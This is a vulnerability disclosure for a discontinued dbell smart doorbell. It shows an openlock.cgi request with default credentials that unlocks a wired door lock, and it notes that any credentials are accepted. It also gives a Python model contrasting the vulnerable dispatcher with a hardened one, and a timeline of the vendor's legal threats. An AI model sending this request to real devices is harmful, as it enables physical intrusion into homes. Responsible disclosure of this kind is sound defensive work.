<p>Looking through the functions I discovered one that unlocks the door. For some background, there is a small relay switch on the back of the doorbell. This switch can be wired to a door lock, which allows you to unlock the door for a guest remotely.
</p>
<p>Upon entering this URL with your doorbell’s IP address into your browser, the doorbell lets out a “door is unlocked” voice message and will unlock the door for you.</p>
<blockquote>
<ul>
<li><strong>hxxp://xxx.xxx.xxx.xxx:81/openlock.cgi?loginuse=admin&amp;loginpass=888888</strong></li>
</ul>
</blockquote>
<p>To make matters even worse, I accidentally discovered that those credentials don’t even matter. You can put absolutely whatever you want as the username and password values and it will execute.</p>
<blockquote>
<ul>
<li><strong>hxxp://xxx.xxx.xxx.xxx:81/openlock.cgi?loginuse=?????&amp;loginpass=?????</strong></li>
</ul>
</blockquote>
<p>It is not limited to opening the lock either: any “.cgi” function on the web server can be executed, because the <em>loginuse</em> and <em>loginpass</em> values are accepted without being validated against the stored credentials.
</p>
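<p>To make the fault concrete, here is an added example (not the dbell firmware, whose source is not reproduced on this page): a minimal Python model of a GoAhead-style CGI dispatcher in the vulnerable form described above, next to a hardened version that checks the credentials before any handler runs. The <em>openlock.cgi</em> path and the <em>loginuse</em>/<em>loginpass</em> parameter names are taken from the write-up; the stored credentials, the documentation address 192.0.2.10 and the <em>Device</em> class are constructed for the demonstration.</p>

```python
"""Model of the doorbell's CGI dispatch: vulnerable form and a hardened one.

Added example; not the dbell firmware. openlock.cgi and the loginuse/loginpass
parameter names come from the write-up, everything else is constructed.
"""
import hmac
from typing import Callable, Dict, Tuple
from urllib.parse import parse_qs, urlsplit

Response = Tuple[int, str]


class Device:
    """Constructed stand-in for the doorbell: one admin credential and a relay."""

    def __init__(self, username: str, password: str) -> None:
        self.creds = {username: password}
        self.unlocked = False

    def openlock(self) -> str:
        self.unlocked = True           # drives the relay wired to the door lock
        return "door is unlocked"      # the voice message the write-up describes

    def handlers(self) -> Dict[str, Callable[[], str]]:
        return {"/openlock.cgi": self.openlock}


def vulnerable_dispatch(dev: Device, url: str) -> Response:
    """The observed behaviour: loginuse/loginpass are read but never checked,
    so any value, or no value at all, reaches the handler."""
    parts = urlsplit(url)
    params = parse_qs(parts.query)
    handler = dev.handlers().get(parts.path)
    if handler is None:
        return 404, "not found"
    _user = params.get("loginuse", [""])[0]      # parsed and ignored
    _password = params.get("loginpass", [""])[0]
    return 200, handler()


def hardened_dispatch(dev: Device, url: str) -> Response:
    """Every CGI handler is gated on a credential check that runs before the
    handler is even looked up. The comparison is constant-time and an unknown
    user is compared against an empty string so it is not distinguishable by
    timing. Credentials in a GET query string still leak into logs and browser
    history; a real fix would use an authenticated session, but this closes
    the bypass described above."""
    parts = urlsplit(url)
    params = parse_qs(parts.query)
    user = params.get("loginuse", [""])[0]
    password = params.get("loginpass", [""])[0]
    expected = dev.creds.get(user, "")
    ok = hmac.compare_digest(expected.encode(), password.encode()) and user in dev.creds
    if not ok:
        return 401, "unauthorized"
    handler = dev.handlers().get(parts.path)
    if handler is None:
        return 404, "not found"
    return 200, handler()


# Constructed requests; 192.0.2.10 is a documentation address, not a real device.
VALID_URL = "http://192.0.2.10:81/openlock.cgi?loginuse=admin&loginpass=888888"
BOGUS_URL = "http://192.0.2.10:81/openlock.cgi?loginuse=?????&loginpass=?????"
NO_CREDS_URL = "http://192.0.2.10:81/openlock.cgi"

if __name__ == "__main__":
    for dispatch in (vulnerable_dispatch, hardened_dispatch):
        dev = Device("admin", "888888")
        print(dispatch.__name__, "bogus creds ->", dispatch(dev, BOGUS_URL), "unlocked:", dev.unlocked)
```

<p>The order of operations in <em>hardened_dispatch</em> is the point: authentication happens before the path is resolved, so a new <em>.cgi</em> handler added later cannot be reached unauthenticated by accident.</p>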
<p>Below is a POC video of the doorbell performing the unlocking function.
</p>
<p><a href="https://www.youtube.com/watch?v=SkTKt1nV57I"><img src="https://img.youtube.com/vi/SkTKt1nV57I/0.jpg" alt="Doorbell Unlocking POC" /></a></p>
<center><h3>Timeline</h3></center>
<ul>
<li><strong>July 4th, 2019</strong> – Privately disclosed vulnerability to dbell.</li>
<li><strong>July 4th, 2019</strong> – Reply from dbell thanking me and explaining it’s been discontinued for 3 years.</li>
<li><strong>July 4th, 2019</strong> – I requested if the vulnerability could be published earlier since the product has been discontinued.</li>
<li><strong>July 5th, 2019</strong> – dbell replies asking me not to disclose anything or else they’d take legal action and that I have malicious intent.</li>
<li><strong>July 9th, 2019</strong> – I replied explaining that I am being responsible and will be giving them 90 days.</li>
<li><strong>July 9th, 2019</strong> – dbell replied saying that there aren’t any apps on the app store to control this device, and that they care about their customers’ security and privacy…</li>
<li><strong>July 16th, 2019</strong> – I explained there are still apps on the app store that can be used to control this device, which helped in finding this vulnerability.</li>
<li><strong>July 18th, 2019</strong> – dbell replied with a very hostile email explaining again that I have malicious intent. They said that the email chain has been forwarded to their legal team and if I don’t stop in 10 days, they will file a case for extortion with the local police before taking legal action.</li>
<li><strong>August 27th, 2019</strong> – Tamir from CIPPIC sent a letter through email explaining that their accusations of malicious intent and extortion have no legal basis.</li>
<li><strong>September 26th, 2019</strong> – Tamir sent a 2 weeks notice of public disclosure in an email to dbell.</li>
<li><strong>October 7th, 2019</strong> – Vulnerability is publicly disclosed.</li>
</ul>